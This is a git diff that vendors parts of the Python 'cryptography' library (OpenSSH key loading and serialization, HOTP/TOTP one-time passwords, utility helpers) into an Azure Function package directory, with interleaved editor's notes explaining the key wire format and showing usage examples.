public_key.curve + if curve.name not in _ECDSA_KEY_TYPE: + raise ValueError( + f"Unsupported curve for ssh private key: {curve.name!r}" + ) + return _ECDSA_KEY_TYPE[curve.name] + + +def _ssh_pem_encode( + data: bytes, + prefix: bytes = _SK_START + b"\n", + suffix: bytes = _SK_END + b"\n", +) -> bytes: + return b"".join([prefix, _base64_encode(data), suffix]) + + +def _check_block_size(data: bytes, block_len: int) -> None: + """Require data to be full blocks""" + if not data or len(data) % block_len != 0: + raise ValueError("Corrupt data: missing padding") + + +def _check_empty(data: bytes) -> None: + """All data should have been parsed.""" + if data: + raise ValueError("Corrupt data: unparsed data") + + +def _init_cipher( + ciphername: bytes, + password: typing.Optional[bytes], + salt: bytes, + rounds: int, +) -> Cipher[typing.Union[modes.CBC, modes.CTR]]: + """Generate key + iv and return cipher.""" + if not password: + raise ValueError("Key is password-protected.") + + algo, key_len, mode, iv_len = _SSH_CIPHERS[ciphername] + seed = _bcrypt_kdf(password, salt, key_len + iv_len, rounds, True) + return Cipher(algo(seed[:key_len]), mode(seed[key_len:])) + + +def _get_u32(data: memoryview) -> typing.Tuple[int, memoryview]: + """Uint32""" + if len(data) < 4: + raise ValueError("Invalid data") + return int.from_bytes(data[:4], byteorder="big"), data[4:] 
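Editor's note: `_get_u32` above, and the string/mpint readers that follow it, all walk the OpenSSH wire format, where every variable-length field is a big-endian uint32 length followed by that many bytes. A standalone sketch of that convention, deliberately independent of the module's private helpers:

```python
import struct

def put_sshstr(val: bytes) -> bytes:
    # Length-prefixed field: 4-byte big-endian length, then the payload.
    return struct.pack(">I", len(val)) + val

def get_sshstr(data: bytes) -> "tuple[bytes, bytes]":
    # Returns (field, remainder), mirroring the (value, data) pairs above.
    (n,) = struct.unpack(">I", data[:4])
    return data[4 : 4 + n], data[4 + n :]

buf = put_sshstr(b"ssh-ed25519") + put_sshstr(b"\x01\x02\x03")
key_type, rest = get_sshstr(buf)
assert key_type == b"ssh-ed25519" and get_sshstr(rest)[0] == b"\x01\x02\x03"
```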
+ + +def _get_u64(data: memoryview) -> typing.Tuple[int, memoryview]: + """Uint64""" + if len(data) < 8: + raise ValueError("Invalid data") + return int.from_bytes(data[:8], byteorder="big"), data[8:] + + +def _get_sshstr(data: memoryview) -> typing.Tuple[memoryview, memoryview]: + """Bytes with u32 length prefix""" + n, data = _get_u32(data) + if n > len(data): + raise ValueError("Invalid data") + return data[:n], data[n:] + + +def _get_mpint(data: memoryview) -> typing.Tuple[int, memoryview]: + """Big integer.""" + val, data = _get_sshstr(data) + if val and val[0] > 0x7F: + raise ValueError("Invalid data") + return int.from_bytes(val, "big"), data + + +def _to_mpint(val: int) -> bytes: + """Storage format for signed bigint.""" + if val < 0: + raise ValueError("negative mpint not allowed") + if not val: + return b"" + nbytes = (val.bit_length() + 8) // 8 + return utils.int_to_bytes(val, nbytes) + + +class _FragList: + """Build recursive structure without data copy.""" + + flist: typing.List[bytes] + + def __init__(self, init: typing.List[bytes] = None) -> None: + self.flist = [] + if init: + self.flist.extend(init) + + def put_raw(self, val: bytes) -> None: + """Add plain bytes""" + self.flist.append(val) + + def put_u32(self, val: int) -> None: + """Big-endian uint32""" + self.flist.append(val.to_bytes(length=4, byteorder="big")) + + def put_sshstr(self, val: typing.Union[bytes, "_FragList"]) -> None: + """Bytes prefixed with u32 length""" + if isinstance(val, (bytes, memoryview, bytearray)): + self.put_u32(len(val)) + self.flist.append(val) + else: + self.put_u32(val.size()) + self.flist.extend(val.flist) + + def put_mpint(self, val: int) -> None: + """Big-endian bigint prefixed with u32 length""" + self.put_sshstr(_to_mpint(val)) + + def size(self) -> int: + """Current number of bytes""" + return sum(map(len, self.flist)) + + def render(self, dstbuf: memoryview, pos: int = 0) -> int: + """Write into bytearray""" + for frag in self.flist: + flen = len(frag) + start, pos = pos, pos + flen + dstbuf[start:pos] = frag + return pos + + def tobytes(self) -> bytes: + """Return as bytes""" + buf = memoryview(bytearray(self.size())) + self.render(buf) + return buf.tobytes() + + +class _SSHFormatRSA: + """Format for RSA keys. 
+ + Public: + mpint e, n + Private: + mpint n, e, d, iqmp, p, q + """ + + def get_public(self, data: memoryview): + """RSA public fields""" + e, data = _get_mpint(data) + n, data = _get_mpint(data) + return (e, n), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[rsa.RSAPublicKey, memoryview]: + """Make RSA public key from data.""" + (e, n), data = self.get_public(data) + public_numbers = rsa.RSAPublicNumbers(e, n) + public_key = public_numbers.public_key() + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[rsa.RSAPrivateKey, memoryview]: + """Make RSA private key from data.""" + n, data = _get_mpint(data) + e, data = _get_mpint(data) + d, data = _get_mpint(data) + iqmp, data = _get_mpint(data) + p, data = _get_mpint(data) + q, data = _get_mpint(data) + + if (e, n) != pubfields: + raise ValueError("Corrupt data: rsa field mismatch") + dmp1 = rsa.rsa_crt_dmp1(d, p) + dmq1 = rsa.rsa_crt_dmq1(d, q) + public_numbers = rsa.RSAPublicNumbers(e, n) + private_numbers = rsa.RSAPrivateNumbers( + p, q, d, dmp1, dmq1, iqmp, public_numbers + ) + private_key = private_numbers.private_key() + return private_key, data + + def encode_public( + self, public_key: rsa.RSAPublicKey, f_pub: _FragList + ) -> None: + """Write RSA public key""" + pubn = public_key.public_numbers() + f_pub.put_mpint(pubn.e) + f_pub.put_mpint(pubn.n) + + def encode_private( + self, private_key: rsa.RSAPrivateKey, f_priv: _FragList + ) -> None: + """Write RSA private key""" + private_numbers = private_key.private_numbers() + public_numbers = private_numbers.public_numbers + + f_priv.put_mpint(public_numbers.n) + f_priv.put_mpint(public_numbers.e) + + f_priv.put_mpint(private_numbers.d) + f_priv.put_mpint(private_numbers.iqmp) + f_priv.put_mpint(private_numbers.p) + f_priv.put_mpint(private_numbers.q) + + +class _SSHFormatDSA: + """Format for DSA keys. 
+ + Public: + mpint p, q, g, y + Private: + mpint p, q, g, y, x + """ + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """DSA public fields""" + p, data = _get_mpint(data) + q, data = _get_mpint(data) + g, data = _get_mpint(data) + y, data = _get_mpint(data) + return (p, q, g, y), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[dsa.DSAPublicKey, memoryview]: + """Make DSA public key from data.""" + (p, q, g, y), data = self.get_public(data) + parameter_numbers = dsa.DSAParameterNumbers(p, q, g) + public_numbers = dsa.DSAPublicNumbers(y, parameter_numbers) + self._validate(public_numbers) + public_key = public_numbers.public_key() + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[dsa.DSAPrivateKey, memoryview]: + """Make DSA private key from data.""" + (p, q, g, y), data = self.get_public(data) + x, data = _get_mpint(data) + + if (p, q, g, y) != pubfields: + raise ValueError("Corrupt data: dsa field mismatch") + parameter_numbers = dsa.DSAParameterNumbers(p, q, g) + public_numbers = dsa.DSAPublicNumbers(y, parameter_numbers) + self._validate(public_numbers) + private_numbers = dsa.DSAPrivateNumbers(x, public_numbers) + private_key = private_numbers.private_key() + return private_key, data + + def encode_public( + self, public_key: dsa.DSAPublicKey, f_pub: _FragList + ) -> None: + """Write DSA public key""" + public_numbers = public_key.public_numbers() + parameter_numbers = public_numbers.parameter_numbers + self._validate(public_numbers) + + f_pub.put_mpint(parameter_numbers.p) + f_pub.put_mpint(parameter_numbers.q) + f_pub.put_mpint(parameter_numbers.g) + f_pub.put_mpint(public_numbers.y) + + def encode_private( + self, private_key: dsa.DSAPrivateKey, f_priv: _FragList + ) -> None: + """Write DSA private key""" + self.encode_public(private_key.public_key(), f_priv) + f_priv.put_mpint(private_key.private_numbers().x) + + def _validate(self, public_numbers: dsa.DSAPublicNumbers) -> None: + parameter_numbers = public_numbers.parameter_numbers + if parameter_numbers.p.bit_length() != 1024: + raise ValueError("SSH supports only 1024 bit DSA keys") + + +class _SSHFormatECDSA: + """Format for ECDSA keys. 
+ + Public: + str curve + bytes point + Private: + str curve + bytes point + mpint secret + """ + + def __init__(self, ssh_curve_name: bytes, curve: ec.EllipticCurve): + self.ssh_curve_name = ssh_curve_name + self.curve = curve + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """ECDSA public fields""" + curve, data = _get_sshstr(data) + point, data = _get_sshstr(data) + if curve != self.ssh_curve_name: + raise ValueError("Curve name mismatch") + if point[0] != 4: + raise NotImplementedError("Need uncompressed point") + return (curve, point), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[ec.EllipticCurvePublicKey, memoryview]: + """Make ECDSA public key from data.""" + (curve_name, point), data = self.get_public(data) + public_key = ec.EllipticCurvePublicKey.from_encoded_point( + self.curve, point.tobytes() + ) + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[ec.EllipticCurvePrivateKey, memoryview]: + """Make ECDSA private key from data.""" + (curve_name, point), data = self.get_public(data) + secret, data = _get_mpint(data) + + if (curve_name, point) != pubfields: + raise ValueError("Corrupt data: ecdsa field mismatch") + private_key = ec.derive_private_key(secret, self.curve) + return private_key, data + + def encode_public( + self, public_key: ec.EllipticCurvePublicKey, f_pub: _FragList + ) -> None: + """Write ECDSA public key""" + point = public_key.public_bytes( + Encoding.X962, PublicFormat.UncompressedPoint + ) + f_pub.put_sshstr(self.ssh_curve_name) + f_pub.put_sshstr(point) + + def encode_private( + self, private_key: ec.EllipticCurvePrivateKey, f_priv: _FragList + ) -> None: + """Write ECDSA private key""" + public_key = private_key.public_key() + private_numbers = private_key.private_numbers() + + self.encode_public(public_key, f_priv) + f_priv.put_mpint(private_numbers.private_value) + + +class _SSHFormatEd25519: + """Format for Ed25519 keys. 
+ + Public: + bytes point + Private: + bytes point + bytes secret_and_point + """ + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """Ed25519 public fields""" + point, data = _get_sshstr(data) + return (point,), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[ed25519.Ed25519PublicKey, memoryview]: + """Make Ed25519 public key from data.""" + (point,), data = self.get_public(data) + public_key = ed25519.Ed25519PublicKey.from_public_bytes( + point.tobytes() + ) + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[ed25519.Ed25519PrivateKey, memoryview]: + """Make Ed25519 private key from data.""" + (point,), data = self.get_public(data) + keypair, data = _get_sshstr(data) + + secret = keypair[:32] + point2 = keypair[32:] + if point != point2 or (point,) != pubfields: + raise ValueError("Corrupt data: ed25519 field mismatch") + private_key = ed25519.Ed25519PrivateKey.from_private_bytes(secret) + return private_key, data + + def encode_public( + self, public_key: ed25519.Ed25519PublicKey, f_pub: _FragList + ) -> None: + """Write Ed25519 public key""" + raw_public_key = public_key.public_bytes( + Encoding.Raw, PublicFormat.Raw + ) + f_pub.put_sshstr(raw_public_key) + + def encode_private( + self, private_key: ed25519.Ed25519PrivateKey, f_priv: _FragList + ) -> None: + """Write Ed25519 private key""" + public_key = private_key.public_key() + raw_private_key = private_key.private_bytes( + Encoding.Raw, PrivateFormat.Raw, NoEncryption() + ) + raw_public_key = public_key.public_bytes( + Encoding.Raw, PublicFormat.Raw + ) + f_keypair = _FragList([raw_private_key, raw_public_key]) + + self.encode_public(public_key, f_priv) + f_priv.put_sshstr(f_keypair) + + +_KEY_FORMATS = { + _SSH_RSA: _SSHFormatRSA(), + _SSH_DSA: _SSHFormatDSA(), + _SSH_ED25519: _SSHFormatEd25519(), + _ECDSA_NISTP256: _SSHFormatECDSA(b"nistp256", ec.SECP256R1()), + _ECDSA_NISTP384: _SSHFormatECDSA(b"nistp384", ec.SECP384R1()), + _ECDSA_NISTP521: _SSHFormatECDSA(b"nistp521", ec.SECP521R1()), +} + + +def _lookup_kformat(key_type: bytes): + """Return valid format or throw error""" + if not isinstance(key_type, bytes): + key_type = memoryview(key_type).tobytes() + if key_type in _KEY_FORMATS: + return _KEY_FORMATS[key_type] + raise UnsupportedAlgorithm(f"Unsupported key type: {key_type!r}") + + +_SSH_PRIVATE_KEY_TYPES = typing.Union[ + ec.EllipticCurvePrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ed25519.Ed25519PrivateKey, +] + + +def load_ssh_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> _SSH_PRIVATE_KEY_TYPES: + """Load private key from OpenSSH custom encoding.""" + utils._check_byteslike("data", data) + if password is not None: + utils._check_bytes("password", password) + + m = _PEM_RC.search(data) + if not m: + raise ValueError("Not OpenSSH private key format") + p1 = m.start(1) + p2 = m.end(1) + data = binascii.a2b_base64(memoryview(data)[p1:p2]) + if not data.startswith(_SK_MAGIC): + raise ValueError("Not OpenSSH private key format") + data = memoryview(data)[len(_SK_MAGIC) :] + + # parse header + ciphername, data = _get_sshstr(data) + kdfname, data = _get_sshstr(data) + kdfoptions, data = _get_sshstr(data) + nkeys, data = _get_u32(data) + if nkeys != 1: + raise ValueError("Only one key supported") + + # load public key data + pubdata, data = _get_sshstr(data) + pub_key_type, pubdata = _get_sshstr(pubdata) + kformat = _lookup_kformat(pub_key_type) + 
pubfields, pubdata = kformat.get_public(pubdata) + _check_empty(pubdata) + + # load secret data + edata, data = _get_sshstr(data) + _check_empty(data) + + if (ciphername, kdfname) != (_NONE, _NONE): + ciphername_bytes = ciphername.tobytes() + if ciphername_bytes not in _SSH_CIPHERS: + raise UnsupportedAlgorithm( + f"Unsupported cipher: {ciphername_bytes!r}" + ) + if kdfname != _BCRYPT: + raise UnsupportedAlgorithm(f"Unsupported KDF: {kdfname!r}") + blklen = _SSH_CIPHERS[ciphername_bytes][3] + _check_block_size(edata, blklen) + salt, kbuf = _get_sshstr(kdfoptions) + rounds, kbuf = _get_u32(kbuf) + _check_empty(kbuf) + ciph = _init_cipher(ciphername_bytes, password, salt.tobytes(), rounds) + edata = memoryview(ciph.decryptor().update(edata)) + else: + blklen = 8 + _check_block_size(edata, blklen) + ck1, edata = _get_u32(edata) + ck2, edata = _get_u32(edata) + if ck1 != ck2: + raise ValueError("Corrupt data: broken checksum") + + # load per-key struct + key_type, edata = _get_sshstr(edata) + if key_type != pub_key_type: + raise ValueError("Corrupt data: key type mismatch") + private_key, edata = kformat.load_private(edata, pubfields) + comment, edata = _get_sshstr(edata) + + # yes, SSH does padding check *after* all other parsing is done. + # need to follow as it writes zero-byte padding too. + if edata != _PADDING[: len(edata)]: + raise ValueError("Corrupt data: invalid padding") + + return private_key + + +def serialize_ssh_private_key( + private_key: _SSH_PRIVATE_KEY_TYPES, + password: typing.Optional[bytes] = None, +) -> bytes: + """Serialize private key with OpenSSH custom encoding.""" + if password is not None: + utils._check_bytes("password", password) + if password and len(password) > _MAX_PASSWORD: + raise ValueError( + "Passwords longer than 72 bytes are not supported by " + "OpenSSH private key format" + ) + + if isinstance(private_key, ec.EllipticCurvePrivateKey): + key_type = _ecdsa_key_type(private_key.public_key()) + elif isinstance(private_key, rsa.RSAPrivateKey): + key_type = _SSH_RSA + elif isinstance(private_key, dsa.DSAPrivateKey): + key_type = _SSH_DSA + elif isinstance(private_key, ed25519.Ed25519PrivateKey): + key_type = _SSH_ED25519 + else: + raise ValueError("Unsupported key type") + kformat = _lookup_kformat(key_type) + + # setup parameters + f_kdfoptions = _FragList() + if password: + ciphername = _DEFAULT_CIPHER + blklen = _SSH_CIPHERS[ciphername][3] + kdfname = _BCRYPT + rounds = _DEFAULT_ROUNDS + salt = os.urandom(16) + f_kdfoptions.put_sshstr(salt) + f_kdfoptions.put_u32(rounds) + ciph = _init_cipher(ciphername, password, salt, rounds) + else: + ciphername = kdfname = _NONE + blklen = 8 + ciph = None + nkeys = 1 + checkval = os.urandom(4) + comment = b"" + + # encode public and private parts together + f_public_key = _FragList() + f_public_key.put_sshstr(key_type) + kformat.encode_public(private_key.public_key(), f_public_key) + + f_secrets = _FragList([checkval, checkval]) + f_secrets.put_sshstr(key_type) + kformat.encode_private(private_key, f_secrets) + f_secrets.put_sshstr(comment) + f_secrets.put_raw(_PADDING[: blklen - (f_secrets.size() % blklen)]) + + # top-level structure + f_main = _FragList() + f_main.put_raw(_SK_MAGIC) + f_main.put_sshstr(ciphername) + f_main.put_sshstr(kdfname) + f_main.put_sshstr(f_kdfoptions) + f_main.put_u32(nkeys) + f_main.put_sshstr(f_public_key) + f_main.put_sshstr(f_secrets) + + # copy result info bytearray + slen = f_secrets.size() + mlen = f_main.size() + buf = memoryview(bytearray(mlen + blklen)) + f_main.render(buf) + ofs 
= mlen - slen + + # encrypt in-place + if ciph is not None: + ciph.encryptor().update_into(buf[ofs:mlen], buf[ofs:]) + + txt = _ssh_pem_encode(buf[:mlen]) + buf[ofs:mlen] = bytearray(slen) + return txt + + +_SSH_PUBLIC_KEY_TYPES = typing.Union[ + ec.EllipticCurvePublicKey, + rsa.RSAPublicKey, + dsa.DSAPublicKey, + ed25519.Ed25519PublicKey, +] + + +def load_ssh_public_key( + data: bytes, backend: typing.Any = None +) -> _SSH_PUBLIC_KEY_TYPES: + """Load public key from OpenSSH one-line format.""" + utils._check_byteslike("data", data) + + m = _SSH_PUBKEY_RC.match(data) + if not m: + raise ValueError("Invalid line format") + key_type = orig_key_type = m.group(1) + key_body = m.group(2) + with_cert = False + if _CERT_SUFFIX == key_type[-len(_CERT_SUFFIX) :]: + with_cert = True + key_type = key_type[: -len(_CERT_SUFFIX)] + kformat = _lookup_kformat(key_type) + + try: + rest = memoryview(binascii.a2b_base64(key_body)) + except (TypeError, binascii.Error): + raise ValueError("Invalid key format") + + inner_key_type, rest = _get_sshstr(rest) + if inner_key_type != orig_key_type: + raise ValueError("Invalid key format") + if with_cert: + nonce, rest = _get_sshstr(rest) + public_key, rest = kformat.load_public(rest) + if with_cert: + serial, rest = _get_u64(rest) + cctype, rest = _get_u32(rest) + key_id, rest = _get_sshstr(rest) + principals, rest = _get_sshstr(rest) + valid_after, rest = _get_u64(rest) + valid_before, rest = _get_u64(rest) + crit_options, rest = _get_sshstr(rest) + extensions, rest = _get_sshstr(rest) + reserved, rest = _get_sshstr(rest) + sig_key, rest = _get_sshstr(rest) + signature, rest = _get_sshstr(rest) + _check_empty(rest) + return public_key + + +def serialize_ssh_public_key(public_key: _SSH_PUBLIC_KEY_TYPES) -> bytes: + """One-line public key format for OpenSSH""" + if isinstance(public_key, ec.EllipticCurvePublicKey): + key_type = _ecdsa_key_type(public_key) + elif isinstance(public_key, rsa.RSAPublicKey): + key_type = _SSH_RSA + elif isinstance(public_key, dsa.DSAPublicKey): + key_type = _SSH_DSA + elif isinstance(public_key, ed25519.Ed25519PublicKey): + key_type = _SSH_ED25519 + else: + raise ValueError("Unsupported key type") + kformat = _lookup_kformat(key_type) + + f_pub = _FragList() + f_pub.put_sshstr(key_type) + kformat.encode_public(public_key, f_pub) + + pub = binascii.b2a_base64(f_pub.tobytes()).strip() + return b"".join([key_type, b" ", pub]) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py new file mode 100644 index 0000000..3ba7994 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py @@ -0,0 +1,7 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
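Editor's note: `ssh.py` above is what gives the package its OpenSSH private/public key support. A small round-trip sketch (the `b"hunter2"` passphrase is illustrative; encrypted output additionally requires the optional `bcrypt` dependency noted at the top of the module):

```python
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

key = ed25519.Ed25519PrivateKey.generate()

# "-----BEGIN OPENSSH PRIVATE KEY-----" block, encrypted with the bcrypt KDF.
blob = key.private_bytes(
    encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.OpenSSH,
    encryption_algorithm=serialization.BestAvailableEncryption(b"hunter2"),
)
restored = serialization.load_ssh_private_key(blob, password=b"hunter2")

# One-line authorized_keys form, handled by load_ssh_public_key.
line = key.public_key().public_bytes(
    encoding=serialization.Encoding.OpenSSH,
    format=serialization.PublicFormat.OpenSSH,
)
pub = serialization.load_ssh_public_key(line)
```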
+ + +class InvalidToken(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3222181 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc new file mode 100644 index 0000000..77ea37b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc new file mode 100644 index 0000000..8f70d26 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py new file mode 100644 index 0000000..ea0a789 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py @@ -0,0 +1,92 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +import base64 +import typing +from urllib.parse import quote, urlencode + +from cryptography.hazmat.primitives import constant_time, hmac +from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512 +from cryptography.hazmat.primitives.twofactor import InvalidToken + + +_ALLOWED_HASH_TYPES = typing.Union[SHA1, SHA256, SHA512] + + +def _generate_uri( + hotp: "HOTP", + type_name: str, + account_name: str, + issuer: typing.Optional[str], + extra_parameters: typing.List[typing.Tuple[str, int]], +) -> str: + parameters = [ + ("digits", hotp._length), + ("secret", base64.b32encode(hotp._key)), + ("algorithm", hotp._algorithm.name.upper()), + ] + + if issuer is not None: + parameters.append(("issuer", issuer)) + + parameters.extend(extra_parameters) + + label = ( + f"{quote(issuer)}:{quote(account_name)}" + if issuer + else quote(account_name) + ) + return f"otpauth://{type_name}/{label}?{urlencode(parameters)}" + + +class HOTP: + def __init__( + self, + key: bytes, + length: int, + algorithm: _ALLOWED_HASH_TYPES, + backend: typing.Any = None, + enforce_key_length: bool = True, + ) -> None: + if len(key) < 16 and enforce_key_length is True: + raise ValueError("Key length has to be at least 128 bits.") + + if not isinstance(length, int): + raise TypeError("Length parameter must be an integer type.") + + if length < 6 or length > 8: + raise ValueError("Length of HOTP has to be between 6 to 8.") + + if not isinstance(algorithm, (SHA1, SHA256, SHA512)): + raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.") + + self._key = key + self._length = length + self._algorithm = algorithm + + def generate(self, counter: int) -> bytes: + truncated_value = self._dynamic_truncate(counter) + hotp = truncated_value % (10**self._length) + return "{0:0{1}}".format(hotp, self._length).encode() + + def verify(self, hotp: bytes, counter: int) -> None: + if not constant_time.bytes_eq(self.generate(counter), hotp): + raise InvalidToken("Supplied HOTP value does not match.") + + def _dynamic_truncate(self, counter: int) -> int: + ctx = hmac.HMAC(self._key, self._algorithm) + ctx.update(counter.to_bytes(length=8, byteorder="big")) + hmac_value = ctx.finalize() + + offset = hmac_value[len(hmac_value) - 1] & 0b1111 + p = hmac_value[offset : offset + 4] + return int.from_bytes(p, byteorder="big") & 0x7FFFFFFF + + def get_provisioning_uri( + self, account_name: str, counter: int, issuer: typing.Optional[str] + ) -> str: + return _generate_uri( + self, "hotp", account_name, issuer, [("counter", int(counter))] + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py new file mode 100644 index 0000000..32c6a0e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py @@ -0,0 +1,48 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
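Editor's note: the `hotp.py` module above implements RFC 4226, so it can be checked against the RFC's published test vectors. A brief sketch (the account and issuer names are illustrative):

```python
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.twofactor import InvalidToken
from cryptography.hazmat.primitives.twofactor.hotp import HOTP

key = b"12345678901234567890"  # the RFC 4226 test secret
hotp = HOTP(key, 6, SHA1())

assert hotp.generate(0) == b"755224"  # first RFC 4226 test vector
hotp.verify(b"755224", 0)             # matching value: no exception

try:
    hotp.verify(b"000000", 0)
except InvalidToken:
    pass  # mismatch raises InvalidToken from twofactor/__init__.py above

uri = hotp.get_provisioning_uri("alice@example.test", 0, issuer="Demo")
```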
+ +import typing + +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.twofactor import InvalidToken +from cryptography.hazmat.primitives.twofactor.hotp import ( + HOTP, + _ALLOWED_HASH_TYPES, + _generate_uri, +) + + +class TOTP: + def __init__( + self, + key: bytes, + length: int, + algorithm: _ALLOWED_HASH_TYPES, + time_step: int, + backend: typing.Any = None, + enforce_key_length: bool = True, + ): + self._time_step = time_step + self._hotp = HOTP( + key, length, algorithm, enforce_key_length=enforce_key_length + ) + + def generate(self, time: typing.Union[int, float]) -> bytes: + counter = int(time / self._time_step) + return self._hotp.generate(counter) + + def verify(self, totp: bytes, time: int) -> None: + if not constant_time.bytes_eq(self.generate(time), totp): + raise InvalidToken("Supplied TOTP value does not match.") + + def get_provisioning_uri( + self, account_name: str, issuer: typing.Optional[str] + ) -> str: + return _generate_uri( + self._hotp, + "totp", + account_name, + issuer, + [("period", int(self._time_step))], + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py new file mode 100644 index 0000000..6e107d4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py @@ -0,0 +1,180 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import enum +import inspect +import sys +import types +import typing +import warnings + + +# We use a UserWarning subclass, instead of DeprecationWarning, because CPython +# decided deprecation warnings should be invisible by default. +class CryptographyDeprecationWarning(UserWarning): + pass + + +# Several APIs were deprecated with no specific end-of-life date because of the +# ubiquity of their use. They should not be removed until we agree on when that +# cycle ends. +PersistentlyDeprecated2019 = CryptographyDeprecationWarning +DeprecatedIn35 = CryptographyDeprecationWarning +DeprecatedIn36 = CryptographyDeprecationWarning +DeprecatedIn37 = CryptographyDeprecationWarning + + +def _check_bytes(name: str, value: bytes) -> None: + if not isinstance(value, bytes): + raise TypeError("{} must be bytes".format(name)) + + +def _check_byteslike(name: str, value: bytes) -> None: + try: + memoryview(value) + except TypeError: + raise TypeError("{} must be bytes-like".format(name)) + + +if typing.TYPE_CHECKING: + from typing_extensions import Protocol + + _T_class = typing.TypeVar("_T_class", bound=type) + + class _RegisterDecoratorType(Protocol): + def __call__( + self, klass: _T_class, *, check_annotations: bool = False + ) -> _T_class: + ...
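Editor's note: `TOTP` in the module above simply divides the timestamp by `time_step` and delegates to `HOTP`, so the RFC 6238 test vectors apply directly. A brief sketch (account and issuer names are illustrative):

```python
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.twofactor.totp import TOTP

key = b"12345678901234567890"  # the RFC 6238 SHA-1 test secret
totp = TOTP(key, 8, SHA1(), time_step=30)

# At Unix time 59 the RFC 6238 SHA-1 vector is 94287082.
assert totp.generate(59) == b"94287082"
totp.verify(b"94287082", 59)

uri = totp.get_provisioning_uri("alice@example.test", issuer="Demo")
```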
